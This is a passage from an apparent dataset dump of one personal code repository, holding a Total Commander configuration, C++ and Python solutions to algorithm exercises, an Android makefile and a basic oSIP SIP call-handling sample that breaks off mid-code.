extension=0\r\nSeparateTree=0\r\nPanelsVertical=0\r\nLogOptions=7198\r\nLogRotateLimit=0\r\nLogKeepCount=30\r\nExplorerForCopy=0\r\nWin95Delete=0\r\nUseTrash=1\r\nIconOverlays=0\r\nIconsSpecialFolders=3\r\nShowicons=2\r\nShowEXEandLNKicons=2\r\nIconsInMenus=16\r\nIconsOnNet=0\r\nShowCentury=1\r\nSizeStyle=3\r\nSizeFooter=3\r\nViewer=none\r\nEditor=gvim 
--remote-tab-silent\r\nViewertype=1\r\nAltSearch=2\r\nQuickSearchMatchBeginning=1\r\nQuickSearchExactMatch=0\r\nSoundDelay=-10\r\nFirstTimeUnpack=0\r\npluginbasedir=D:\\totalcmd\\plugins\r\nQuickSearchAutoFilter=1\r\nFirstTimeZIP=0\r\nttciniwritable=27103\r\nSyncFlags=0\r\nSyncButtons=63\r\nCompareCaseSensitive=0\r\nCompareIgnoreRepSpace=1\r\nCompareIgnoreRepeatedLines=1\r\nCompareVertical=0\r\nShowHiddenSystem=0\r\nUseLongNames=1\r\nSmall83Names=0\r\nOldStyleTree=0\r\nautotreechange=0\r\nDirBrackets=1\r\nShowParentDirInRoot=0\r\nSortDirsByName=1\r\nTips=2\r\nFileTipWindows=0\r\nWin32TipWindows=0\r\nSortUpper=0\r\nAutoComplete=1\r\n[Layout]\r\nDriveBar1=1\r\nDriveBar2=0\r\nDriveBarFlat=1\r\nInterfaceFlat=1\r\nDriveCombo=0\r\nDirectoryTabs=1\r\nXPthemeBg=0\r\nCurDir=1\r\nTabHeader=1\r\nStatusBar=1\r\nCmdLine=0\r\nKeyButtons=0\r\nHistoryHotlistButtons=0\r\nBreadCrumbBar=1\r\nButtonBar=1\r\n[1280x800 (8x16)]\r\nMenuChangeX=160\r\nMenuChangeY=120\r\nMenuChangeDX=960\r\nMenuChangeDY=560\r\nMenuChangeMax=0\r\nmaximized=1\r\nx=240\r\ny=100\r\ndx=800\r\ndy=600\r\nDivider=500\r\nDividerQuickView=500\r\nDividerComments=500\r\nTabstops=241,254,325,-1,736,93\r\nFontSize=10\r\nFontName=Consolas\r\nFontSizeWindow=10\r\nFontNameWindow=Consolas\r\nFontWeight=400\r\nFontWeightWindow=700\r\nFontNameDialog=Microsoft Sans Serif\r\nFontCharset=1\r\nFontCharsetWindow=1\r\nFontSizeDialog=9\r\nCmdSelX=318\r\nCmdSelY=176\r\nCmdSelDX=637\r\nCmdSelDY=371\r\nCmdSelMax=0\r\nTreeDlgX=166\r\nTreeDlgY=168\r\nTreeDlgDX=411\r\nTreeDlgDY=397\r\nTreeDlgMax=0\r\nRenameX=317\r\nRenameY=170\r\nRenameDX=646\r\nRenameDY=460\r\nRenameMax=0\r\nRenameTabs=115,145,345,405,525\r\nSearchX=365\r\nSearchY=266\r\nSearchDX=553\r\nSearchDY=179\r\nSearchMax=0\r\nConnectX=397\r\nConnectY=215\r\nConnectDX=485\r\nConnectDY=370\r\nConnectMax=0\r\nSyncX=318\r\nSyncY=113\r\nSyncDX=649\r\nSyncDY=470\r\nSyncMax=0\r\nSyncTabs=92,152,247,270,362,422\r\nCompareX=132\r\nCompareY=132\r\nCompareDX=960\r\nCompareDY=560\r\nCompareMax=1\r\nCompareDivider=500\r\n[Buttonbar]\r\nButtonheight=29\r\nFlatIcons=1\r\nSmallIcons=1\r\nSmallIconSize=16\r\nXPstyle=1\r\nButtonbar=D:\\totalcmd\\NO.BAR\r\n[Tabstops]\r\n0=241\r\n1=254\r\n3=325\r\n4=-1\r\n6=736\r\n5=93\r\nAdjustWidth=1\r\n[left]\r\npath=D:\\freegate\\\r\nShowAllDetails=1\r\nSpecialView=0\r\nshow=1\r\nsortorder=0\r\nnegative Sortorder=0\r\n[right]\r\npath=e:\\Projects\\7000v\\protocols\\\r\nShowAllDetails=1\r\nSpecialView=0\r\nshow=1\r\nsortorder=0\r\nnegative 
Sortorder=0\r\n[Colors]\r\nInverseCursor=1\r\nInverseSelection=0\r\nBackColor=12632256\r\nBackColor2=-1\r\nForeColor=-1\r\nMarkColor=-1\r\nCursorColor=10309634\r\nCursorText=-1\r\n[Shortcuts]\r\nCA+P=cm_PackFiles\r\nF2=cm_RenameOnly\r\nF6=cm_MoveOnly\r\nA+C=cm_CopyNamesToClip\r\nA+UP=cm_DirectoryHotlist\r\nS+C=cm_GotoDriveC\r\nS+D=cm_GotoDriveD\r\nS+E=cm_GotoDriveE\r\nS+F=cm_GotoDriveF\r\nS+G=em_GotoDriveG\r\nS+H=em_GotoDriveH\r\nS+I=em_GotoDriveI\r\nS+J=em_GotoDriveJ\r\nS+K=em_GotoDriveK\r\nS+L=em_GotoDriveL\r\nS+M=em_GotoDriveM\r\nS+N=em_GotoDriveN\r\nS+O=em_GotoDriveO\r\nS+P=em_GotoDriveP\r\nS+Q=em_GotoDriveQ\r\nS+R=em_GotoDriveR\r\nS+S=em_GotoDriveS\r\nS+T=em_GotoDriveT\r\nS+U=em_GotoDriveU\r\nS+V=em_GotoDriveV\r\nS+W=em_GotoDriveW\r\nS+X=em_GotoDriveX\r\nS+Y=em_GotoDriveY\r\nS+Z=cm_GotoDriveZ\r\nA+D=cm_ExecuteDOS\r\nC+O=cm_GotoPreviousLocalDir\r\nC+I=cm_GotoNextLocalDir\r\nCA+U=cm_UnpackFiles\r\nA+R=cm_FocusCmdLine\r\nA+E=cm_EditPath\r\nCA+V=cm_CompareFilesByContent\r\nAS+V=cm_IntCompareFilesByContent\r\nC+F=cm_SearchFor\r\nAS+C=cm_CopyFileDetailsToClip\r\nCA+C=cm_CopyFullNamesToClip\r\nA+B=em_StartBash\r\nC+N=cm_SwitchToNextTab\r\nC+P=cm_SwitchToPreviousTab\r\n[Lister]\r\nBgColor=12632256\r\n[Confirmation]\r\ndeleteDirs=0\r\nOverwriteFiles=1\r\nOverwriteReadonly=1\r\nOverwriteHidSys=1\r\nMouseActions=1\r\n[MkDirHistory]\r\n0=dir\r\n[RenameTemplates]\r\n0=[N]\r\n[PackerPlugins]\r\nmd5=21,D:\\totalcmd\\plugins\\wcx\\checksum\\checksum.wcx\r\nsha=21,D:\\totalcmd\\plugins\\wcx\\checksum\\checksum.wcx\r\niso=192,D:\\totalcmd\\plugins\\wcx\\iso\\iso.wcx\r\nmsi=0,D:\\totalcmd\\plugins\\wcx\\msi\\msi.wcx\r\nmsp=0,D:\\totalcmd\\plugins\\wcx\\msi\\msi.wcx\r\nbz2=251,D:\\totalcmd\\plugins\\wcx\\bzip2\\bzip2dll.wcx\r\nz=11,D:\\totalcmd\\plugins\\wcx\\wcx_z\\z.wcx\r\n7z=95,D:\\totalcmd\\plugins\\wcx\\7zip\\7zip.wcx\r\nwipe=5,D:\\totalcmd\\plugins\\wcx\\wipe\\wipe.wcx\r\nTreeCopyPlus=21,D:\\totalcmd\\plugins\\wcx\\TreeCopyPlus\\TreeCopyPlus.wcx\r\nlst=23,D:\\totalcmd\\plugins\\wcx\\CatalogMaker\\CatalogMaker.wcx\r\n[SearchIn]\r\n0=d:\\\r\n1=f:\\E-Book\\.NET\\.NET FrameWork\r\n[SearchText]\r\n0=ctrl+alt\r\n1=old\r\n2=environment\r\n[Packer]\r\nDefPlugin=wipe\r\nLastUsedPacker=10008\r\n[ContentPlugins]\r\n0_date=993439992\r\n0_flags=15\r\n[ListerPlugins]\r\n0=D:\\totalcmd\\plugins\\wlx\\fileinfo\\fileinfo.wlx\r\n1=D:\\totalcmd\\plugins\\wlx\\Imagine\\Imagine.wlx\r\n1_detect=\"MULTIMEDIA\"\r\n2=D:\\totalcmd\\plugins\\wlx\\Office\\office.wlx\r\n[FileSystemPlugins]\r\nRegistry=D:\\totalcmd\\plugins\\wfx\\Registry\\Registry.wfx\r\nServices=D:\\totalcmd\\plugins\\wfx\\Services\\Services.wfx\r\nDevice Manager=D:\\totalcmd\\plugins\\wfx\\DevMan\\devman.wfx\r\nTask manager=D:\\totalcmd\\plugins\\wfx\\procfs\\PROCFS.wfx\r\nUnInstaller=D:\\totalcmd\\plugins\\wfx\\Uninstall\\UnInstTC.wfx\r\nEnvironment Variables=D:\\totalcmd\\plugins\\wfx\\Environment Variables\\envvar.wfx\r\nAceHelper=D:\\totalcmd\\plugins\\wfx\\AceHelper\\AceHelper.wfx\r\nNT Events=D:\\totalcmd\\plugins\\wfx\\EventNT\\EventNT.wfx\r\n[Command line history]\r\n0=find ./ -name *.orig\r\n1=hg st\r\n[RightHistory]\r\n0=D:\\\r\n[LeftHistory]\r\n0=D:\\\r\n[DirMenu]\r\nmenu1=--\r\nmenu2=&books\r\ncmd2=cd f:\\E-Book\r\nmenu3=&projects\r\ncmd3=cd e:\\Projects\r\nmenu4=&home\r\ncmd4=cd d:\\home\r\nmenu5=&desktop\r\ncmd5=cd %$DESKTOP%\r\nmenu6=docu&ments\r\ncmd6=cd d:\\home\\documents\r\nmenu7=&network places\r\ncmd7=cd ::{208D2C60-3AEA-1069-A2D7-08002B30309D}\r\n[SearchName]\r\n0=*.png\r\n" }, { "alpha_fraction": 0.36049383878707886, 
"alphanum_fraction": 0.37962964177131653, "avg_line_length": 20.81690216064453, "blob_id": "a40127bbf166fd9a8aa5ca4b5dbcc0ec004efa18", "content_id": "e8cc0fa6dfa125516499cf3d4079aab0abb894e8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1620, "license_type": "permissive", "max_line_length": 88, "num_lines": 71, "path": "/algorithm/i2a_ex_15.4-5/ex15_4_5.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\r\n// \r\n// Filename: ex15_4_5.cpp\r\n// \r\n// Description: \r\n// \r\n// Version: 1.0\r\n// Created: 1/19/2010 ARRAYSIZE:09:24 PM\r\n// Revision: none\r\n// Compiler: g++\r\n// \r\n// Author: Raymond Wen (), \r\n// Company: \r\n// \r\n// =====================================================================================\r\n\r\n#include\t<iostream>\r\n#include\t<vector>\r\n#include\t<time.h>\r\n#include\t<cstdlib>\r\n\r\nusing namespace std;\r\nvector<int> s;\r\nstatic int ARRAYSIZE;\r\n\r\nint random()\r\n{\r\n static int initialized = false;\r\n if(!initialized)\r\n {\r\n srand(static_cast<unsigned int>(time(NULL)));\r\n initialized = true;\r\n }\r\n\r\n return rand()%100;\r\n}\t\t// ---------- end of function random ----------\r\n\r\nvoid LMIS(const vector<int> &a)\r\n{\r\n int size = static_cast<int>(a.size());\r\n for(int i = 0; i < size; ++i)\r\n {\r\n s[i] = 1;\r\n for(int j = 0; j < i; ++j)\r\n {\r\n if(s[i] <= s[j] && a[i] > a[j])\r\n s[i] = s[j] + 1;\r\n }\r\n }\r\n}\r\n\r\nint main ( int argc, char *argv[] )\r\n{\r\n vector<int> a;\r\n ARRAYSIZE = 5;\r\n if(argc > 1)\r\n ARRAYSIZE = atoi(argv[1]);\r\n for(int k = 0; k < ARRAYSIZE; ++k)\r\n {\r\n a.push_back(random());\r\n cout << a[k] << ' ';\r\n s.push_back(0);\r\n }\r\n cout << endl;\r\n LMIS(a);\r\n cout << \"S:\\t\";\r\n for(int i = 0; i < ARRAYSIZE; ++i)\r\n cout << s[i] << ' ';\r\n cout << endl;\r\n return 0;\r\n}\t\t\t\t// ---------- end of function main ----------\r\n" }, { "alpha_fraction": 0.6944444179534912, "alphanum_fraction": 0.6944444179534912, "avg_line_length": 18.058822631835938, "blob_id": "3623bed4ca306a2e2fdba68ed853b61c45ded0e4", "content_id": "0cfe57eed91bc68db29e243577f5a6426d36a3e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 324, "license_type": "permissive", "max_line_length": 40, "num_lines": 17, "path": "/android/exosip_sample/sip_jni/jni/Android.mk", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "LOCAL_PATH := $(call my-dir)\n\ninclude $(CLEAR_VARS)\n\nLOCAL_MODULE := sip-jni\nLOCAL_SRC_FILES := sip-jni.c\n\nLOCAL_CFLAGS +=\t-DOSIP_MT -DENABLE_TRACE\n\nLOCAL_SHARED_LIBRARIES := \\\n libosip libexosip\n\nLOCAL_LDLIBS += -llog\n\ninclude $(BUILD_SHARED_LIBRARY)\n$(call import-module,libosip)\n$(call import-module,libexosip)\n" }, { "alpha_fraction": 0.5413026213645935, "alphanum_fraction": 0.5504368543624878, "avg_line_length": 39.180850982666016, "blob_id": "fedfa925551c1c2a9abca38d2d3e11ab83982962", "content_id": "d7d8dd84a60900c6c82389875ffd1cf2657392ed", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7566, "license_type": "permissive", "max_line_length": 282, "num_lines": 188, "path": "/algorithm/topcoder/practice_room/inv_2001_a+b/250.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// 
=====================================================================================\n// \n// Filename: 250.cpp\n// \n// Description: Problem Statement\n//     \n// THIS PROBLEM WAS TAKEN FROM THE SEMIFINALS OF THE TOPCODER INVITATIONAL\n// TOURNAMENT\n//\n// DEFINITION\n// Class Name: MatchMaker\n// Method Name: getBestMatches\n// Parameters: String[], String, int\n// Returns: String[]\n// Method signature (be sure your method is public): String[]\n// getBestMatches(String[] members, String currentUser, int sf);\n//\n// PROBLEM STATEMENT\n// A new online match making company needs some software to help find the \"perfect\n// couples\". People who sign up answer a series of multiple-choice questions.\n// Then, when a member makes a \"Get Best Mates\" request, the software returns a\n// list of users whose gender matches the requested gender and whose answers to\n// the questions were equal to or greater than a similarity factor when compared\n// to the user's answers.\n//\n// Implement a class MatchMaker, which contains a method getBestMatches. The\n// method takes as parameters a String[] members, String currentUser, and an int\n// sf:\n// - members contains information about all the members. Elements of members are\n// of the form \"NAME G D X X X X X X X X X X\" \n// * NAME represents the member's name\n// * G represents the gender of the current user. \n// * D represents the requested gender of the potential mate. \n// * Each X indicates the member's answer to one of the multiple-choice\n// questions. The first X is the answer to the first question, the second is the\n// answer to the second question, et cetera. \n// - currentUser is the name of the user who made the \"Get Best Mates\" request. \n// - sf is an integer representing the similarity factor.\n//\n// The method returns a String[] consisting of members' names who have at least sf\n// identical answers to currentUser and are of the requested gender. The names\n// should be returned in order from most identical answers to least. If two\n// members have the same number of identical answers as the currentUser, the names\n// should be returned in the same relative order they were inputted.\n//\n// TopCoder will ensure the validity of the inputs. Inputs are valid if all of\n// the following criteria are met:\n// - members will have between 1 and 50 elements, inclusive.\n// - Each element of members will have a length between 7 and 44, inclusive.\n// - NAME will have a length between 1 and 20, inclusive, and only contain\n// uppercase letters A-Z.\n// - G can be either an uppercase M or an uppercase F.\n// - D can be either an uppercase M or an uppercase F.\n// - Each X is a capital letter (A-D).\n// - The number of Xs in each element of the members is equal. The number of Xs\n// will be between 1 and 10, inclusive. 
\n// - No two elements will have the same NAME.\n// - Names are case sensitive.\n// - currentUser consists of between 1 and 20, inclusive, uppercase letters, A-Z,\n// and must be a member.\n// - sf is an int between 1 and 10, inclusive.\n// - sf must be less than or equal to the number of answers (Xs) of the members.\n//\n// NOTES\n// The currentUser should not be included in the returned list of potential mates.\n//\n//\n// EXAMPLES\n//\n// For the following examples, assume members =\n// {\"BETTY F M A A C C\",\n// \"TOM M F A D C A\",\n// \"SUE F M D D D D\",\n// \"ELLEN F M A A C A\",\n// \"JOE M F A A C A\",\n// \"ED M F A D D A\",\n// \"SALLY F M C D A B\",\n// \"MARGE F M A A C C\"}\n//\n// If currentUser=\"BETTY\" and sf=2, BETTY and TOM have two identical answers and\n// BETTY and JOE have three identical answers, so the method should return\n// {\"JOE\",\"TOM\"}.\n//\n// If currentUser=\"JOE\" and sf=1, the method should return\n// {\"ELLEN\",\"BETTY\",\"MARGE\"}.\n//\n// If currentUser=\"MARGE\" and sf=4, the method should return [].\n// Definition\n//     \n// Class:\n// MatchMaker\n// Method:\n// getBestMatches\n// Parameters:\n// vector <string>, string, int\n// Returns:\n// vector <string>\n// Method signature:\n// vector <string> getBestMatches(vector <string> param0, string param1, int param2)\n// (be sure your method is public)\n//     \n//\n// This problem statement is the exclusive and proprietary property of TopCoder, Inc. Any unauthorized use or reproduction of this information without the prior written consent of TopCoder, Inc. is strictly prohibited. (c)2003, TopCoder, Inc. All rights reserved.\n// \n// Version: 1.0\n// Created: 08/13/2011 08:56:07 AM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t<vector>\n#include\t<string>\n\nusing std::vector;\nusing std::string;\n\nvector<string> split_string(const string& str, char splitter)\n{\n vector<string> result;\n int index = 0, pos = 0;\n while(string::npos != (index = str.find_first_of(splitter, pos)))\n {\n result.push_back(str.substr(pos, index-pos));\n pos = index+1;\n }\n if(pos != str.length())\n result.push_back(str.substr(pos));\n return result;\n}\n\nclass MatchMaker\n{\npublic:\n vector<string> getBestMatches(vector <string> param0, string param1, int param2);\n};\n\nvector<string> MatchMaker::getBestMatches(vector <string> param0, string param1, int param2)\n{\n vector<string> result;\n vector<string> ele = split_string(param1, ' '); \n for(vector<string>::const_iterator ite_input = param0.begin(); \n ite_input != param0.end(); ++ite_input)\n {\n vector<string> e = split_string(*ite_input, ' ');\n if(ele[0] == e[0])\n continue;\n if(ele[2] != e[1])\n continue;\n int match_count = 0, i = 2;\n while(i < e.size() && i < ele.size())\n {\n if(e[i] == ele[i])\n ++match_count;\n ++i;\n }\n if(match_count >= param2)\n result.push_back(e[0]);\n }\n return result;\n}\n\n#include\t<iostream>\n\nint main ( int argc, char *argv[] )\n{\n MatchMaker mm;\n string str(\"BETTY F M A A C C\");\n vector<string> input;\n input.push_back(\"BETTY F M A A C C\");\n input.push_back(\"TOM M F A D C A\");\n input.push_back(\"SUE F M D D D D\");\n input.push_back(\"ELLEN F M A A C A\");\n input.push_back(\"JOE M F A A C A\");\n input.push_back(\"ED M F A D D A\");\n input.push_back(\"SALLY F M C D A B\");\n input.push_back(\"MARGE F M A A C C\");\n vector<string> r = 
mm.getBestMatches(input, str, 2);\n using namespace std;\n cout << r.size() << endl;\n for(vector<string>::iterator i = r.begin(); i != r.end(); ++i)\n cout << *i << endl;\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.4951139986515045, "alphanum_fraction": 0.524429976940155, "avg_line_length": 11.260869979858398, "blob_id": "051f624bfda7bd3964e93b038416c6cc7f5bf936", "content_id": "585bb28256c914422f08f7573919cc6905516bf8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 307, "license_type": "permissive", "max_line_length": 74, "num_lines": 23, "path": "/wince/ce_profiling/ce_profiling/ce_profiling.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// ce_profiling.cpp : Defines the entry point for the console application.\r\n//\r\n\r\n#include \"stdafx.h\"\r\n\r\nvoid bar()\r\n{\r\n Sleep(1000);\r\n printf(\"bar\\n\");\r\n}\r\n\r\nvoid foo()\r\n{\r\n bar();\r\n Sleep(3000);\r\n printf(\"foo\\n\");\r\n}\r\n\r\nint _tmain(int argc, _TCHAR* argv[])\r\n{\r\n foo();\r\n\treturn 0;\r\n}\r\n\r\n" }, { "alpha_fraction": 0.4253022372722626, "alphanum_fraction": 0.46459412574768066, "avg_line_length": 25.31818199157715, "blob_id": "11bd52ff382a7dc47131553a8146b7607b3daead", "content_id": "6b54c59a6f5fe98fee250a10d2743739aa938654", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2316, "license_type": "permissive", "max_line_length": 211, "num_lines": 88, "path": "/algorithm/leetcode/2_add_two_numbers.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n *\n * http://leetcode.com/onlinejudge#question_2\n *\n * Add Two NumbersNov 1 '114923 / 15944\n *\n * You are given two linked lists representing two non-negative numbers. The digits are stored in reverse order and each of their nodes contain a single digit. Add the two numbers and return it as a linked list.\n *\n * Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)\n * Output: 7 -> 0 -> 8\n *\n */\n\n#include <iostream>\n\nstruct ListNode {\n int val;\n ListNode *next;\n ListNode(int x) : val(x), next(NULL) {}\n};\n\nusing namespace std;\nclass Solution {\n public:\n ListNode *addTwoNumbers(ListNode *l1, ListNode *l2) {\n int carry = 0;\n ListNode *cur_digit = NULL;\n ListNode *result = NULL;\n ListNode *new_digit = cur_digit;\n while(NULL != l1 || NULL != l2 || 0 != carry) {\n new_digit = new ListNode(0);\n if(NULL == cur_digit) {\n cur_digit = new_digit;\n result = cur_digit;\n }\n else {\n cur_digit->next = new_digit;\n cur_digit = new_digit;\n }\n int v1 = NULL == l1 ? 0 : l1->val;\n int v2 = NULL == l2 ? 0 : l2->val;\n cur_digit->val = carry + v1 + v2;\n carry = 0;\n if(cur_digit->val > 9) {\n cur_digit->val %= 10;\n carry = 1;\n }\n l1 = NULL == l1 ? l1 : l1->next;\n l2 = NULL == l2 ? 
l2 : l2->next;\n }\n return result;\n }\n};\n\nvoid print_list(ListNode* l) {\n while(NULL != l) {\n cout << l->val << ' ';\n l = l->next;\n }\n cout << endl;\n}\nint main(int argc, const char *argv[]) {\n ListNode *l1 = new ListNode(5);\n //ListNode *c1 = l1, *t1;\n //t1 = new ListNode(4);\n //c1->next = t1;\n //c1 = t1;\n //t1 = new ListNode(3);\n //c1->next = t1;\n //c1 = t1;\n\n ListNode *l2 = new ListNode(5);\n //ListNode *c2 = l2, *t2;\n //t2 = new ListNode(1);\n //c2->next = t2;\n //c2 = t2;\n //t2 = new ListNode(4);\n //c2->next = t2;\n //c1 = t2;\n print_list(l1);\n print_list(l2);\n\n Solution s;\n\n ListNode *result = s.addTwoNumbers(l1, l2);\n print_list(result);\n return 0;\n}\n" }, { "alpha_fraction": 0.6144413948059082, "alphanum_fraction": 0.6505449414253235, "avg_line_length": 25.214284896850586, "blob_id": "7cfa6e56ce0198091bcb3db412c258168aeadf2d", "content_id": "99e1b0d69e8ef51f6f9c9ce2e08f7ea239ff48c3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2952, "license_type": "permissive", "max_line_length": 344, "num_lines": 112, "path": "/algorithm/codeforces/1/1b.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nhttp://codeforces.com/problemset/problem/1/B\n\nB. Spreadsheets\ntime limit per test\n10 seconds\nmemory limit per test\n64 megabytes\ninput\nstandard input\noutput\nstandard output\n\nIn the popular spreadsheets systems (for example, in Excel) the following numeration of columns is used. The first column has number A, the second — number B, etc. till column 26 that is marked by Z. Then there are two-letter numbers: column 27 has number AA, 28 — AB, column 52 is marked by AZ. After ZZ there follow three-letter numbers, etc.\n\nThe rows are marked by integer numbers starting with 1. The cell name is the concatenation of the column and the row numbers. For example, BC23 is the name for the cell that is in column 55, row 23.\n\nSometimes another numeration system is used: RXCY, where X and Y are integer numbers, showing the column and the row numbers respectfully. For instance, R23C55 is the cell from the previous example.\n\nYour task is to write a program that reads the given sequence of cell coordinates and produce each item written according to the rules of another numeration system.\nInput\n\nThe first line of the input contains integer number n (1 ≤ n ≤ 105), the number of coordinates in the test. Then there follow n lines, each of them contains coordinates. 
All the coordinates are correct, there are no cells with the column and/or the row numbers larger than 106 .\nOutput\n\nWrite n lines, each line should contain a cell coordinates in the other numeration system.\nSample test(s)\nInput\n\n2\nR23C55\nBC23\n\nOutput\n\nBC23\nR23C55\n\"\"\"\n\ndef convert_to_type1(s):\n i = 1\n while s[i] != 'C':\n i += 1\n row = 0\n row = s[1:i]\n col = int(s[i+1:])\n\n col_result = \"\"\n while col != 0:\n if col%26 == 0:\n col_result = 'Z'+col_result\n col -= 26\n else:\n col_result = chr(ord('A')+col%26-1)+col_result\n col = col/26\n return col_result+row\n\ndef convert_to_type2(s):\n row = 0\n col = 0\n\n i = 0\n while s[i].isalpha():\n i+=1\n col = s[:i]\n row = s[i:]\n\n col_result = 0\n j = 0\n while j<i:\n col_result = col_result*26\n col_result += ord(col[j])-ord('A')+1\n j += 1\n return \"R%sC%s\"%(row, col_result)\n\ndef determine_type(s):\n end_of_alpha = 0\n while s[end_of_alpha].isalpha():\n end_of_alpha += 1\n while end_of_alpha < len(s):\n if s[end_of_alpha].isalpha():\n return 2\n end_of_alpha += 1\n return 1\n\ndef convert(s):\n if 1 == determine_type(s):\n return convert_to_type2(s)\n else:\n return convert_to_type1(s)\n\nnum_of_rows = int(raw_input())\ni = 0\nresult = []\nwhile i < num_of_rows:\n s = raw_input()\n result.append(convert(s))\n i += 1\n\nfor l in result:\n print l\n#convert(\"A12\")\n#convert(\"Z12\")\n#convert(\"AA12\")\n#convert(\"BC12\")\n#convert(\"R27C34\")\n#convert(\"R1C34\")\n#convert(\"R26C34\")\n#convert(\"R55C34\")\n" }, { "alpha_fraction": 0.6751990914344788, "alphanum_fraction": 0.6973834037780762, "avg_line_length": 27.897119522094727, "blob_id": "cf4b9360d5aad1a3daf000cf51f79843ee794718", "content_id": "87bb3fc6a3cf78a491914f1fa7e4fe33cb3162b9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7032, "license_type": "permissive", "max_line_length": 95, "num_lines": 243, "path": "/protocol/basic_osip_sample/basic_osip_sample.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// basic_osip_sample.cpp : Defines the entry point for the console application.\n// http://www.gnu.org/software/osip/doc/html/group__howto0__initialize.html\n#include \"stdafx.h\"\n#define ENABLE_TRACE\n#include \"winsock2.h\"\n#include \"osip2/osip.h\"\n#include <osip2/osip_mt.h>\n#include <iostream>\n#include <sstream>\n#include <assert.h>\n\n#define\tUNUSED(x) (void(x))\n\nusing namespace std;\n\nstatic SOCKET g_sock;\nstatic const size_t BUFFSIZE = 1600; // MTU usually doesn't exceed 1600\n\nint cb_SendMsg(osip_transaction_t *tr, osip_message_t *sip, char *, int port, int out_socket)\n{\n\tUNUSED(out_socket);\n\tUNUSED(tr);\n\tUNUSED(port);\n\tchar *msgP;\n\tsize_t msgLen;\n\tosip_message_to_str(sip, &msgP, &msgLen);\n\t\n\tstringstream ss;\n\tss << tr->topvia->host << ':' << tr->topvia->port;\n\tstruct sockaddr addr;\n\tint addrSize = sizeof(struct sockaddr);\n\tWSAStringToAddressA(const_cast<LPSTR>(ss.str().c_str()), AF_INET, NULL, &addr, &addrSize);\n\n\tsendto(out_socket, msgP, msgLen, 0, &addr, addrSize);\n\treturn 0;\n}\n\nint BuildResponse(const osip_message_t *request, osip_message_t **response)\n{\n\tosip_message_t *msg = NULL;\n\tosip_message_init(&msg);\n\n\tosip_from_clone(request->from, &msg->from);\n\tosip_to_clone(request->to, &msg->to);\n\tosip_cseq_clone(request->cseq, &msg->cseq);\n\tosip_call_id_clone(request->call_id, &msg->call_id);\n\n\tint pos = 0;//copy vias from request to response\n\twhile (!osip_list_eol 
(&request->vias, pos))\n\t{\n\t\tosip_via_t *via;\n\t\tosip_via_t *via2;\n\n\t\tvia = (osip_via_t *) osip_list_get (&request->vias, pos);\n\t\tint i = osip_via_clone (via, &via2);\n\t\tif (i != 0)\n\t\t{\n\t\t\tosip_message_free (msg);\n\t\t\treturn i;\n\t\t}\n\t\tosip_list_add (&(msg->vias), via2, -1);\n\t\tpos++;\n\t}\n\t\n\tosip_to_set_tag(msg->to, osip_strdup(\"4893693\")); // set to tag in response\n\tosip_message_set_version(msg, osip_strdup(\"SIP/2.0\"));\n\tosip_message_set_contact(msg, osip_strdup(\"sip:[email protected]\"));\n\tosip_message_set_user_agent(msg, osip_strdup(\"Linphone/3.2.1 (eXosip2/3.3.0)\"));\n\t*response = msg;\n\treturn 0;\n}\n\nvoid cb_RcvICTRes(int, osip_transaction_t *, osip_message_t *)\n{\n\tOutputDebugString(TEXT(\"cb_RcvICTRes fired\"));\n}\n\nvoid cb_RcvNICTRes(int, osip_transaction_t *, osip_message_t *)\n{\n\tOutputDebugString(TEXT(\"cb_RcvNICTRes fired\"));\n}\n\nvoid cb_ISTTranKill(int, osip_transaction_t *)\n{\n\tOutputDebugString(TEXT(\"cb_ISTTranKill fired\"));\n}\n\nvoid* Notify(void* arg)\n{\t\n\tosip_transaction_t *tran = static_cast<osip_transaction_t*>(arg);\n\t\n\tosip_message_t *response = NULL;\t\n\tosip_event_t *evt = NULL;\n\tBuildResponse(tran->orig_request, &response);\n\n\tcout << \"incoming call from \" << tran->from->url << endl << \" [a]nswer or [d]ecline?\" << endl;\n\tchar act = 'd';\n\tcin >> act;\n\tif('a' == act)\n\t{//accept call\n\t\tosip_message_set_status_code(response, SIP_OK);\n\t\tosip_message_set_reason_phrase(response, osip_strdup(\"OK\"));\n\t\tconst char* mime = \"application/sdp\";\n\t\tosip_message_set_body_mime(response, mime, strlen(mime));\n\t\tosip_message_set_content_type(response, mime);\n\t\tconst char* sdp = \"v=0\\r\\n\\\r\no=raymond 323456 654323 IN IP4 127.0.0.1\\r\\n\\\r\ns=A conversation\\r\\n\\\r\nc=IN IP4 127.0.0.1\\r\\n\\\r\nt=0 0\\r\\n\\\r\nm=audio 7078 RTP/AVP 111 110 0 8 101\\r\\n\\\r\na=rtpmap:111 speex/16000/1\\r\\n\\\r\na=rtpmap:110 speex/8000/1\\r\\n\\\r\na=rtpmap:0 PCMU/8000/1\\r\\n\\\r\na=rtpmap:8 PCMA/8000/1\\r\\n\\\r\na=rtpmap:101 telephone-event/8000\\r\\n\\\r\na=fmtp:101 0-11\\r\\n\";\n\t\t\n\t\tosip_message_set_body(response, 